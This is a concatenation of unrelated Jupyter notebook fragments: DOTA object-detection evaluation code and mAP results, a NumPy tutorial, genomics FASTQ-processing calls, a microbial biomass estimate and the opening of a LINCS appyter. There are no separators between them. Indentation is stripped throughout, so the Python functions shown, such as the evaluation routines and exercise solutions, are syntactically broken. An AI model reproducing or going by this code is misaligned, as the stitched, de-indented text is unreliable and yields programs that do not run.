# pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'results.pkl')
pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'valresults.pkl')
output_path = os.path.join('/content/ReDet/work_dirs', config_name)
type = args.type
parse_results(config_file, pkl_file, output_path, type)
```
# Using the commands below, three parsed result folders are obtained from the generated serialized file
```
!python /content/ReDet/tools/parse_results.py --config /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py --type OBB
```
For Task 1 evaluation, the Task1_results_nms folder must be downloaded, zipped, and uploaded.
```
#!tar -cvf '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms.tar' '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms'
```
# Evaluation on the val set
```
import glob
import os
os.chdir(r'/content/ReDet/data/dota/val/images')
# myFiles = glob.glob('*.bmp')
%ls -1 | sed 's/\.png//g' > ./testset.txt
# print(myFiles)
!mv '/content/ReDet/data/dota/val/images/testset.txt' '/content/ReDet/data/dota/val'
%%writefile /content/ReDet/DOTA_devkit/dota_evaluation_task1.py
import os
import xml.etree.ElementTree as ET
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.insert(1,os.path.dirname(__file__))
import polyiou
import argparse
def parse_gt(filename):
"""
:param filename: ground truth file to parse
:return: all instances in a picture
"""
objects = []
with open(filename, 'r') as f:
while True:
line = f.readline()
if line:
splitlines = line.strip().split(' ')
object_struct = {}
if (len(splitlines) < 9):
continue
object_struct['name'] = splitlines[8]
if (len(splitlines) == 9):
object_struct['difficult'] = 0
elif (len(splitlines) == 10):
object_struct['difficult'] = int(splitlines[9])
object_struct['bbox'] = [float(splitlines[0]),
float(splitlines[1]),
float(splitlines[2]),
float(splitlines[3]),
float(splitlines[4]),
float(splitlines[5]),
float(splitlines[6]),
float(splitlines[7])]
objects.append(object_struct)
else:
break
return objects
def voc_ap(rec, prec, use_07_metric=False):
""" ap = voc_ap(rec, prec, [use_07_metric])
Compute VOC AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec >= t) == 0:
p = 0
else:
p = np.max(prec[rec >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def voc_eval(detpath,
annopath,
imagesetfile,
classname,
# cachedir,
ovthresh=0.5,
use_07_metric=False):
"""rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
[ovthresh],
[use_07_metric])
Top level function that does the PASCAL VOC evaluation.
detpath: Path to detections
detpath.format(classname) should produce the detection results file.
annopath: Path to annotations
annopath.format(imagename) should be the xml annotations file.
imagesetfile: Text file containing the list of images, one image per line.
classname: Category name (duh)
cachedir: Directory for caching the annotations
[ovthresh]: Overlap threshold (default = 0.5)
[use_07_metric]: Whether to use VOC07's 11 point AP computation
(default False)
"""
# assumes detections are in detpath.format(classname)
# assumes annotations are in annopath.format(imagename)
# assumes imagesetfile is a text file with each line an image name
# cachedir caches the annotations in a pickle file
# read list of images
with open(imagesetfile, 'r') as f:
lines = f.readlines()
imagenames = [x.strip() for x in lines]
recs = {}
for i, imagename in enumerate(imagenames):
##############################################################################################################
# print('parse_files name: ', annopath.format(imagename))
recs[imagename] = parse_gt(annopath.format(imagename))
# extract gt objects for this class
class_recs = {}
npos = 0
for imagename in imagenames:
R = [obj for obj in recs[imagename] if obj['name'] == classname]
bbox = np.array([x['bbox'] for x in R])
difficult = np.array([x['difficult'] for x in R]).astype(bool)  # np.bool was removed in NumPy 1.24; use the builtin bool
det = [False] * len(R)
npos = npos + sum(~difficult)
class_recs[imagename] = {'bbox': bbox,
'difficult': difficult,
'det': det}
# read dets from Task1* files
detfile = detpath.format(classname)
with open(detfile, 'r') as f:
lines = f.readlines()
splitlines = [x.strip().split(' ') for x in lines]
image_ids = [x[0] for x in splitlines]
confidence = np.array([float(x[1]) for x in splitlines])
BB = np.array([[float(z) for z in x[2:]] for x in splitlines])
# sort by confidence
sorted_ind = np.argsort(-confidence)
sorted_scores = np.sort(-confidence)
# note: fancy indexing like this works on numpy arrays, not on Python lists
BB = BB[sorted_ind, :]
image_ids = [image_ids[x] for x in sorted_ind]
# go down dets and mark TPs and FPs
nd = len(image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for d in range(nd):
R = class_recs[image_ids[d]]
bb = BB[d, :].astype(float)
ovmax = -np.inf
BBGT = R['bbox'].astype(float)
# compute det bb with each BBGT
if BBGT.size > 0:
# compute overlaps
# intersection
# 1. calculate the overlaps between HBBs; if the IoU between two HBBs is 0, the IoU between the corresponding OBBs is 0 too.
BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)
BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)
BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)
BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)
bb_xmin = np.min(bb[0::2])
bb_ymin = np.min(bb[1::2])
bb_xmax = np.max(bb[0::2])
bb_ymax = np.max(bb[1::2])
ixmin = np.maximum(BBGT_xmin, bb_xmin)
iymin = np.maximum(BBGT_ymin, bb_ymin)
ixmax = np.minimum(BBGT_xmax, bb_xmax)
iymax = np.minimum(BBGT_ymax, bb_ymax)
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +
(BBGT_xmax - BBGT_xmin + 1.) *
(BBGT_ymax - BBGT_ymin + 1.) - inters)
overlaps = inters / uni
BBGT_keep_mask = overlaps > 0
BBGT_keep = BBGT[BBGT_keep_mask, :]
BBGT_keep_index = np.where(overlaps > 0)[0]
def calcoverlaps(BBGT_keep, bb):
overlaps = []
for index, GT in enumerate(BBGT_keep):
overlap = polyiou.iou_poly(polyiou.VectorDouble(
BBGT_keep[index]), polyiou.VectorDouble(bb))
overlaps.append(overlap)
return overlaps
if len(BBGT_keep) > 0:
overlaps = calcoverlaps(BBGT_keep, bb)
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
# pdb.set_trace()
jmax = BBGT_keep_index[jmax]
if ovmax > ovthresh:
if not R['difficult'][jmax]:
if not R['det'][jmax]:
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
# compute precision recall
print('check fp:', fp)
print('check tp', tp)
print('npos num:', npos)
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(npos)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = voc_ap(rec, prec, use_07_metric)
return rec, prec, ap
def dota_task1_eval(work_dir, det_dir):
detpath = os.path.join(det_dir, r'Task1_{:s}.txt')
annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'
imagesetfile = r'data/dota/test/testset.txt'
# For DOTA-v1.0
classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
classaps = []
map = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
# writing results to txt file
with open(os.path.join(work_dir, 'Task1_results.txt'), 'w') as f:
out_str = ''
out_str += 'mAP:'+str(map)+'\n'
out_str += 'APs:\n'
out_str += ' '.join([str(ap)for ap in classaps.tolist()])
f.write(out_str)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--work_dir',default='')
return parser.parse_args()
def main():
args = parse_args()
# detpath = os.path.join(args.work_dir,'Task1_results_nms/Task1_{:s}.txt')
detpath = os.path.join(args.work_dir,'Task1_results_nms/{:s}.txt')
###################################################################################################################
# change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
# annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'
# imagesetfile = r'data/dota/test/testset.txt'
annopath = r'/content/ReDet/data/dota/val/labelTxt/{:s}.txt'
imagesetfile = r'/content/ReDet/data/dota/val/testset.txt'
# For DOTA-v1.5
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter', 'container-crane']
# For DOTA-v1.0
classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
classaps = []
map = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
# # uncomment to show the p-r curve of each category
# plt.figure(figsize=(8,4))
# plt.xlabel('Recall')
# plt.ylabel('Precision')
# plt.xticks(fontsize=11)
# plt.yticks(fontsize=11)
# plt.xlim(0, 1)
# plt.ylim(0, 1)
# ax = plt.gca()
# ax.spines['top'].set_color('none')
# ax.spines['right'].set_color('none')
# plt.plot(rec, prec)
# # plt.show()
# plt.savefig('pr_curve/{}.png'.format(classname))
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
if __name__ == '__main__':
main()
!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1
!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota
!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota
```
# Validation results
**ReDet**
map: 0.8514600172670281
classaps: [90.74063962 88.35952404 70.27778167 83.69586216 71.37892832 88.03846396
88.83972303 90.90909091 89.87234694 90.00746689 90.00924415 82.27596327
88.32895278 80.09628041 84.35975774]
**faster_rcnn_RoITrans_r50_fpn_1x_dota**
map: 0.8416679746473459
classaps: [90.14526646 87.5615606 73.58691439 80.72462287 74.76489526 88.86002316
88.68232501 90.59249634 87.15753582 90.14873059 75.92481942 85.70194711
87.96535504 81.13566148 79.54980843]
**faster_rcnn_obb_r50_fpn_1x_dota**
map: 0.7869873566873331
classaps: [90.22626651 83.21467398 60.88286463 66.33192138 70.29939163 84.09063058
88.17042018 90.89576113 80.49975872 89.18961722 78.22831552 79.33052598
75.461711 71.27527659 72.38389998]
## Importing the library
```
import numpy as np
```
## Data Types
### Scalars
```
# creating a scalar, we use the 'array' in order to create any type of data type e.g. scalar, vector, matrix
s = np.array(5)
# visualizing the shape of a scalar: it returns an empty tuple, which is expected
# a scalar has zero dimensions, which numpy represents as a zero-length shape tuple
print(s.shape)
# we can do operations on a scalar e.g addition
x = s + 3
print(x)
```
### Vectors
```
# creating a vector. we have to pass a list as input
v = np.array([1,2,3])
# visualizing the shape: (3,) means a 1-D array of length 3
print(v.shape)
# access the second element (indexing is zero-based)
v[1]
# access from the second element to the last
v[1:]
```
### Matrices
```
# creating a matrix, with a list of lists as input
m = np.array([[1,2,3], [4,5,6], [7,8,9]])
# visualize shape, a 3 x 3 matrix
m.shape
# access from the second row, first two elements
m[1,:2]
# access the last column (here, the third) across all rows
m[:,-1]
```
### Tensors
```
# creating a 4-dimensional tensor
t = np.array([[[[1],[2]],[[3],[4]],[[5],[6]]],[[[7],[8]],\
[[9],[10]],[[11],[12]]],[[[13],[14]],[[15],[16]],[[17],[18]]]])
# visualize shape, this structure is going to be used a lot of times in PyTorch and other deep learning frameworks
t.shape
# access number 16, we have to pass through the dimensions by using multiple indices
# in order to get to the value
t[2][1][1][0]
```
### Changing shapes
Sometimes you'll need to change the shape of your data without actually changing its contents. For example, you may have a vector, which is one-dimensional, but need a matrix, which is two-dimensional.
```
# let's say we have a row vector
v = np.array([1,2,3,4])
v.shape
# what if we wanted a 1x4 matrix instead, without re-declaring the variable
x = v.reshape(1,4) # specify the number of rows first, then the number of columns
print(x)
x.shape
# and we could change back to 4x1
x = x.reshape(4,1)
print(x)
x.shape
```
#### Other way of changing shape
From Udacity: Those lines create a slice that looks at all of the items of `v` but asks NumPy to add a new dimension of size 1 for the associated axis. It may look strange to you now, but it's a common technique so it's good to be aware of it.
```
# another way to reshape is slicing with None (np.newaxis), a common practice when working with numpy arrays
# v[None, :] adds a new leading axis of size 1, turning the 4-long vector into a 1x4 row
x = v[None, :]
print(x)
x.shape
# v[:, None] adds a new trailing axis, turning the vector into a 4x1 column
x = v[:, None]
print(x)
x.shape
```
### Element-wise operations
```
# performing a scalar addition
values = [1,2,3,4,5]
values = np.array(values) + 5
print(values)
# scalar multiplication, you can either use operators or functions
some_values = [2,3,4,5]
x = np.multiply(some_values, 5)
print(x)
y = np.array(some_values) * 5
print(y)
# set every element to 0 in a matrix
m = np.array([1,27,98, 5])
print(m)
# now every element in m is zero, no matter how many dimensions it has
m *= 0
print(m)
```
### Element-wise Matrix Operations
The **key** here is that these operations require matrices of the same shape;
if the shapes differed, the addition below would fail.
```
a = np.array([[1,3],[5,7]])
b = np.array([[2,4],[6,8]])
a + b
```
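A quick sketch of what happens when the shapes do not match: NumPy raises a `ValueError` because the shapes cannot be broadcast together.

```
import numpy as np

# element-wise addition with mismatched, non-broadcastable shapes fails
a = np.array([[1, 3], [5, 7]])   # shape (2, 2)
c = np.array([[2, 4, 6]])        # shape (1, 3)
try:
    a + c
except ValueError as e:
    print("incompatible shapes:", e)
```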
### Matrix multiplication
### Important Reminders About Matrix Multiplication
- The number of columns in the left matrix must equal the number of rows in the right matrix.
- The answer matrix always has the same number of rows as the left matrix and the same number of columns as the right matrix.
- Order matters. Multiplying A•B is not the same as multiplying B•A.
- Data in the left matrix should be arranged as rows, while data in the right matrix should be arranged as columns.
```
m = np.array([[1,2,3],[4,5,6]])
n = m * 0.25
np.multiply(m,n) # element-wise product, equivalent to m * n
```
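The reminders above can be checked with a small `np.matmul` example (the block above uses the element-wise product; the true matrix product is shown here):

```
import numpy as np

A = np.array([[1, 2, 3], [4, 5, 6]])    # 2 x 3
B = np.array([[1, 2], [3, 4], [5, 6]])  # 3 x 2

# columns of A (3) match rows of B (3), so the product is defined
C = np.matmul(A, B)
print(C.shape)                # (2, 2): rows of A, columns of B

# order matters: B times A gives a 3 x 3 matrix instead
print(np.matmul(B, A).shape)  # (3, 3)
```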
#### Matrix Product
```
# pay close attention to the shapes of the matrices
# the column of the left matrix must have the same value as the row of the right matrix
a = np.array([[1,2,3,4],[5,6,7,8]])
print(a.shape)
b = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])
print(b.shape)
c = np.matmul(a,b)
print(c)
```
#### Dot Product
It turns out that the results of `dot` and `matmul` are the same if the matrices are two dimensional. However, if the dimensions differ then you should expect different results so it's best to check the documentation for [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) and [matmul](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html#numpy.matmul).
```
a = np.array([[1,2],[3,4]])
# two ways of calling dot product
np.dot(a,a)
a.dot(a)
np.matmul(a,a)
```
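A small sketch of where `dot` and `matmul` agree and where they diverge: for 2-D arrays the results are identical, while for stacked 3-D inputs `matmul` performs a batch of matrix products and `dot` contracts over a different pairing of axes.

```
import numpy as np

a = np.array([[1, 2], [3, 4]])

# identical for 2-D inputs
print(np.array_equal(np.dot(a, a), np.matmul(a, a)))  # True

# for 3-D (stacked) inputs they diverge:
# matmul broadcasts over the leading axis (batched matrix product),
# dot combines every matrix of the first stack with every matrix of the second
s = np.ones((2, 3, 4))
t = np.ones((2, 4, 5))
print(np.matmul(s, t).shape)  # (2, 3, 5)
print(np.dot(s, t).shape)     # (2, 3, 2, 5)
```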
### Matrix Transpose
If the original matrix is not square, the transpose changes its shape: technically we are swapping rows and columns,
e.g. a 2x4 matrix becomes 4x2.
#### Rule of thumb: you can transpose for matrix multiplication if the data in the original matrices was arranged in rows, but this doesn't always apply
Stop and really think about what is in your matrices and which values should interact with each other.
```
m = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(m)
print(m.shape)
```
NumPy does this without actually moving any data in memory -
it simply changes the way it indexes the original matrix - so it’s quite efficient.
```
# let's do a transpose
m.T
# be careful with modifying data
m_t = m.T
m_t[3][1] = 200
m_t
```
Notice how it modified both the transpose and the original matrix, too!
```
m
```
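The shared-memory claim can be checked directly with `np.shares_memory`; a quick sketch:

```
import numpy as np

m = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
m_t = m.T

# the transpose is a view: both names index the same underlying buffer
print(np.shares_memory(m, m_t))  # True

# so a write through either name is visible through the other
m_t[3][1] = 200
print(m[1][3])                   # 200
```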
#### Real case example
```
# we have two matrices inputs and weights (essential concepts for Neural Networks)
inputs = np.array([[-0.27, 0.45, 0.64, 0.31]])
print(inputs)
inputs.shape
weights = np.array([[0.02, 0.001, -0.03, 0.036], \
[0.04, -0.003, 0.025, 0.009], [0.012, -0.045, 0.28, -0.067]])
print(weights)
weights.shape
# let's try to do a matrix multiplication
np.matmul(inputs, weights)
```
What happened was that our matrices were not compatible: the number of columns in the left matrix didn't equal the number of rows in the right matrix. So what do we do? We transpose, but which one? That depends on what shape we want.
```
np.matmul(inputs, weights.T)
# in order for this to work we have to swap the order of our matrices
np.matmul(weights, inputs.T)
```
The two answers are transposes of each other, so which multiplication you use really just depends on the shape you want for the output.
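We can verify that claim directly:

```
import numpy as np

inputs = np.array([[-0.27, 0.45, 0.64, 0.31]])
weights = np.array([[0.02, 0.001, -0.03, 0.036],
                    [0.04, -0.003, 0.025, 0.009],
                    [0.012, -0.045, 0.28, -0.067]])

a = np.matmul(inputs, weights.T)  # shape (1, 3)
b = np.matmul(weights, inputs.T)  # shape (3, 1)

# same numbers, different layout
print(np.allclose(a, b.T))        # True
```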
### Numpy exercises
```
def prepare_inputs(inputs):
# TODO: create a 2-dimensional ndarray from the given 1-dimensional list;
# assign it to input_array
input_array = np.array([inputs])
# TODO: find the minimum value in input_array and subtract that
# value from all the elements of input_array. Store the
# result in inputs_minus_min
inputs_minus_min = input_array - input_array.min()
# TODO: find the maximum value in inputs_minus_min and divide
# all of the values in inputs_minus_min by the maximum value.
# Store the results in inputs_div_max.
inputs_div_max = inputs_minus_min / inputs_minus_min.max()
# return the three arrays we've created
return input_array, inputs_minus_min, inputs_div_max
def multiply_inputs(m1, m2):
# TODO: Check the shapes of the matrices m1 and m2.
# m1 and m2 will be ndarray objects.
#
# Return False if the shapes cannot be used for matrix
# multiplication. You may not use a transpose
if m1.shape[0] != m2.shape[1] and m1.shape[1] != m2.shape[0]:
return False
# TODO: If you have not returned False, then calculate the matrix product
# of m1 and m2 and return it. Do not use a transpose,
# but you may swap their order if necessary
if m1.shape[1] == m2.shape[0]:
return np.matmul(m1, m2)
else:
return np.matmul(m2, m1)
def find_mean(values):
# TODO: Return the average of the values in the given Python list
return np.mean(values)
input_array, inputs_minus_min, inputs_div_max = prepare_inputs([-1,2,7])
print("Input as Array: {}".format(input_array))
print("Input minus min: {}".format(inputs_minus_min))
print("Input Array: {}".format(inputs_div_max))
print("Multiply 1:\n{}".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3],[4]]))))
print("Multiply 2:\n{}".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3]]))))
print("Multiply 3:\n{}".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1,2]]))))
print("Mean == {}".format(find_mean([1,3,4])))
```
```
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import SplitFastqFileBySeqLength
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'
SplitFastqFileBySeqLength.main(f)
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import FindScanRNAInFastq
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES150bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly26bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import SplitFastqFileBySeqLength
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'
SplitFastqFileBySeqLength.main(f)
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import FindScanRNAInFastq
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly25bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
```
```
#Load dependencies
import numpy as np
import pandas as pd
pd.options.display.float_format = '{:,.1e}'.format
import sys
sys.path.insert(0, '../../statistics_helper')
from CI_helper import *
from excel_utils import *
```
# Estimating the total biomass of marine deep subsurface archaea and bacteria
We use our best estimates for the total number of marine deep subsurface prokaryotes, the carbon content of marine deep subsurface prokaryotes and the fraction of archaea and bacteria out of the total population of marine deep subsurface prokaryotes to estimate the total biomass of marine deep subsurface bacteria and archaea.
```
results = pd.read_excel('marine_deep_subsurface_prok_biomass_estimate.xlsx')
results
```
We multiply all the relevant parameters to arrive at our best estimate for the biomass of marine deep subsurface archaea and bacteria, and propagate the uncertainties associated with each parameter to calculate the uncertainty associated with the estimate for the total biomass.
```
# Calculate the total biomass of marine archaea and bacteria
total_arch_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][2]
total_bac_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][3]
print('Our best estimate for the total biomass of marine deep subsurface archaea is %.0f Gt C' %(total_arch_biomass/1e15))
print('Our best estimate for the total biomass of marine deep subsurface bacteria is %.0f Gt C' %(total_bac_biomass/1e15))
# Propagate the uncertainty associated with each parameter to the final estimate
arch_biomass_uncertainty = CI_prod_prop(results['Uncertainty'][:3])
bac_biomass_uncertainty = CI_prod_prop(results.iloc[[0,1,3]]['Uncertainty'])
print('The uncertainty associated with the estimate for the biomass of archaea is %.1f-fold' %arch_biomass_uncertainty)
print('The uncertainty associated with the estimate for the biomass of bacteria is %.1f-fold' %bac_biomass_uncertainty)
# Feed bacteria results to Table 1 & Fig. 1
update_results(sheet='Table1 & Fig1',
row=('Bacteria','Marine deep subsurface'),
col=['Biomass [Gt C]', 'Uncertainty'],
values=[total_bac_biomass/1e15,bac_biomass_uncertainty],
path='../../results.xlsx')
# Feed archaea results to Table 1 & Fig. 1
update_results(sheet='Table1 & Fig1',
row=('Archaea','Marine deep subsurface'),
col=['Biomass [Gt C]', 'Uncertainty'],
values=[total_arch_biomass/1e15,arch_biomass_uncertainty],
path='../../results.xlsx')
# Feed bacteria results to Table S1
update_results(sheet='Table S1',
row=('Bacteria','Marine deep subsurface'),
col=['Number of individuals'],
values= results['Value'][0]*results['Value'][3],
path='../../results.xlsx')
# Feed archaea results to Table S1
update_results(sheet='Table S1',
row=('Archaea','Marine deep subsurface'),
col=['Number of individuals'],
values= results['Value'][0]*results['Value'][2],
path='../../results.xlsx')
```
```
#%%appyter init
from appyter import magic
magic.init(lambda _=globals: _())
%%appyter hide_code
{% do SectionField(
name='PRIMARY',
title='1. Upload your data',
subtitle='Upload up and down gene-sets to perform two-sided rank enrichment. '+
'Upload up- or down-only gene-sets to perform rank analysis for that direction.',
img='file-upload.png'
) %}
{% do SectionField(
name='ENRICHMENT',
title='2. Choose libraries for enrichment',
subtitle='Select the libraries that would be used for consensus analysis, as well as the Enrichr and '+
'Drugmonizome libraries to use for enriching the consensus perturbagens.',
img='find-replace.png'
) %}
{% do SectionField(
name='PARAMETER',
title='3. Tweak the parameters',
subtitle='Modify the parameters to suit the needs of your analysis.',
img='hammer-screwdriver.png'
) %}
%%appyter markdown
{% set title = StringField(
name='title',
label='Notebook Name',
default='SigCom LINCS Consensus Signatures',
section="PRIMARY",
) %}
# {{ title.raw_value }}
```
SigCom LINCS hosts ranked L1000 [1] perturbation signatures from a variety of perturbation types, including drugs and other small molecules, CRISPR knockouts, shRNA knockdowns, and single-gene overexpression. The SigCom LINCS RESTful APIs enable querying the signatures programmatically to identify mimickers or reversers of input up and down gene sets. This appyter extends that functionality by analyzing a collection of input signatures to identify consistently recurring mimickers and reversers. The appyter takes as input a set of two-sided or one-sided gene sets and constructs a score matrix of mimicking and reversing signatures, from which it computes the consensus. The pipeline also includes (1) a Clustergrammer [2] interactive heatmap, and (2) enrichment analysis of the top gene perturbations [3-6] to elucidate the pathways targeted by the consensus perturbagens.
```
import re
import math
import time
import requests
import pandas as pd
import json
import scipy.stats as st
from IPython.display import display, IFrame, Markdown, HTML
import seaborn as sns
import matplotlib.pyplot as plt
from umap import UMAP
from sklearn.manifold import TSNE
from maayanlab_bioinformatics.normalization import quantile_normalize, zscore_normalize
from maayanlab_bioinformatics.harmonization import ncbi_genes_lookup
from tqdm import tqdm
import plotly.express as px
import numpy as np
